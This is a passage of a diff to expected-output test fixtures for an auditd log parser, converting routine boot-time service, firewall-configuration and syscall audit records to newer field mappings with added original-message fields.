@@ }, { "@timestamp": "2016-12-07T02:16:25.104Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 33, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "sshd-keygen", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.104:33): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=sshd-keygen comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 7686, @@ -870,15 +1161,19 @@ "@timestamp": "2016-12-07T02:16:25.099Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 34, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.099:34): table=security family=10 entries=0", "event.type": [ "change" ], @@ -901,9 +1196,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.099:34): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=445 pid=446 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -928,15 +1230,19 @@ "@timestamp": "2016-12-07T02:16:25.128Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 35, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.128:35): table=mangle family=10 entries=0", "event.type": [ "change" ], @@ -959,9 +1265,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.128:35): arch=c000003e syscall=313 success=yes exit=0 a0=0 a1=41a15c a2=0 a3=0 items=0 ppid=449 pid=450 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -984,15 +1297,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.164Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 36, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.164:36): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 8723, @@ -1005,15 +1328,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.166Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 37, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.166:37): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 8960, @@ -1026,15 +1359,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.167Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 38, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-start", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.167:38): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-start comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9196, @@ -1047,15 +1390,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.168Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 39, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-start", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.168:39): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-start comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9434, @@ -1068,15 +1421,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.170Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 40, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit-wait", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.170:40): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit-wait comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9671, @@ -1089,15 +1452,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.170Z", + "auditd.log.record_type": "SERVICE_STOP", "auditd.log.sequence": 41, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "plymouth-quit-wait", - "event.action": "service_stop", + "event.action": [ + "stopped-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_STOP msg=audit(1481076985.170:41): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=plymouth-quit-wait comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "stop" + ], "fileset.name": "log", "input.type": "log", "log.offset": 9913, @@ -1110,15 +1483,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.180Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 42, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "serial-getty@ttyS0", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.180:42): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=serial-getty@ttyS0 comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 10154, @@ -1131,15 +1514,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.187Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 43, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "getty@tty1", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.187:43): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=getty@tty1 comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 10396, @@ -1154,15 +1547,19 @@ "@timestamp": "2016-12-07T02:16:25.191Z", "auditd.log.entries": 0, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 44, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.191:44): table=nat family=10 entries=0", "event.type": [ "change" ], @@ -1185,9 +1582,16 @@ "auditd.log.syscall": "313", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.191:44): arch=c000003e syscall=313 success=yes exit=0 a0=1 a1=41a15c a2=0 a3=1 items=0 ppid=452 pid=453 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"modprobe\" exe=\"/usr/bin/kmod\" subj=system_u:system_r:insmod_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1210,15 +1614,25 @@ }, { "@timestamp": "2016-12-07T02:16:25.511Z", + "auditd.log.record_type": "SERVICE_START", "auditd.log.sequence": 45, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", "auditd.log.unit": "firewalld", - "event.action": "service_start", + "event.action": [ + "started-service" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SERVICE_START msg=audit(1481076985.511:45): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=firewalld comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 11027, @@ -1233,15 +1647,19 @@ "@timestamp": "2016-12-07T02:16:25.528Z", "auditd.log.entries": 5, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 46, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.528:46): table=nat family=2 entries=5", "event.type": [ "change" ], @@ -1264,9 +1682,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.528:46): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=25be720 items=0 ppid=296 pid=476 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1291,15 +1716,19 @@ "@timestamp": "2016-12-07T02:16:25.532Z", "auditd.log.entries": 5, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 47, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.532:47): table=nat family=2 entries=5", "event.type": [ "change" ], @@ -1322,9 +1751,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.532:47): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=1819720 items=0 ppid=296 pid=478 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1349,15 +1785,19 @@ "@timestamp": "2016-12-07T02:16:25.534Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 48, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.534:48): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -1380,9 +1820,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.534:48): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=13d0850 items=0 ppid=296 pid=479 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1407,15 +1854,19 @@ "@timestamp": "2016-12-07T02:16:25.537Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 49, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.537:49): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -1438,9 +1889,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.537:49): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=1125850 items=0 ppid=296 pid=481 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1465,15 +1923,19 @@ "@timestamp": "2016-12-07T02:16:25.538Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 50, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.538:50): table=security family=2 entries=4", "event.type": [ "change" ], @@ -1496,9 +1958,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.538:50): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=20a3600 items=0 ppid=296 pid=482 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1523,15 +1992,19 @@ "@timestamp": "2016-12-07T02:16:25.542Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 51, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.542:51): table=security family=2 entries=4", "event.type": [ "change" ], @@ -1554,9 +2027,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.542:51): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=9f0600 items=0 ppid=296 pid=484 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1581,15 +2061,19 @@ "@timestamp": "2016-12-07T02:16:25.543Z", "auditd.log.entries": 3, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 52, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.543:52): table=raw family=2 entries=3", "event.type": [ "change" ], @@ -1612,9 +2096,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.543:52): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=232e4d0 items=0 ppid=296 pid=485 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1639,15 +2130,19 @@ "@timestamp": "2016-12-07T02:16:25.546Z", "auditd.log.entries": 3, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 53, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.546:53): table=raw family=2 entries=3", "event.type": [ "change" ], @@ -1670,9 +2165,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.546:53): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=14404d0 items=0 ppid=296 pid=487 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1697,15 +2199,19 @@ "@timestamp": "2016-12-07T02:16:25.548Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 54, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.548:54): table=filter family=2 entries=4", "event.type": [ "change" ], @@ -1728,9 +2234,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.548:54): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=c31600 items=0 ppid=296 pid=488 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1755,15 +2268,19 @@ "@timestamp": "2016-12-07T02:16:25.552Z", "auditd.log.entries": 4, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 55, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.552:55): table=filter family=2 entries=4", "event.type": [ "change" ], @@ -1786,9 +2303,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.552:55): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=143a600 items=0 ppid=296 pid=490 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1813,15 +2337,19 @@ "@timestamp": "2016-12-07T02:16:25.553Z", "auditd.log.entries": 5, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 56, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.553:56): table=nat family=10 entries=5", "event.type": [ "change" ], @@ -1844,9 +2372,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.553:56): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=109b880 items=0 ppid=296 pid=491 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1871,15 +2406,19 @@ "@timestamp": "2016-12-07T02:16:25.556Z", "auditd.log.entries": 5, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 57, "auditd.log.table": "nat", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.556:57): table=nat family=10 entries=5", "event.type": [ "change" ], @@ -1902,9 +2441,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.556:57): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=b53880 items=0 ppid=296 pid=493 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1929,15 +2475,19 @@ "@timestamp": "2016-12-07T02:16:25.557Z", "auditd.log.entries": 6, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 58, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.557:58): table=mangle family=10 entries=6", "event.type": [ "change" ], @@ -1960,9 +2510,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.557:58): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=17b09e0 items=0 ppid=296 pid=494 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -1987,15 +2544,19 @@ "@timestamp": "2016-12-07T02:16:25.560Z", "auditd.log.entries": 6, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 59, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.560:59): table=mangle family=10 entries=6", "event.type": [ "change" ], @@ -2018,9 +2579,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.560:59): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=25cc9e0 items=0 ppid=296 pid=496 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2045,15 +2613,19 @@ "@timestamp": "2016-12-07T02:16:25.562Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 60, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + 